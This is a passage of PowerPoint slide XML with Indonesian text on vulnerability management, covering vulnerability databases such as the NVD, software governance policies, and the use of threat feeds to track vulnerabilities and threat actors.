            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Basis Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Nasional (National Vulnerability Database/NVD) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> saran </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat-alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seputar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan-kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audit rutin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persetujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pustaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teridentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> feed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> real-time dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengintegrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> feed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengintegrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
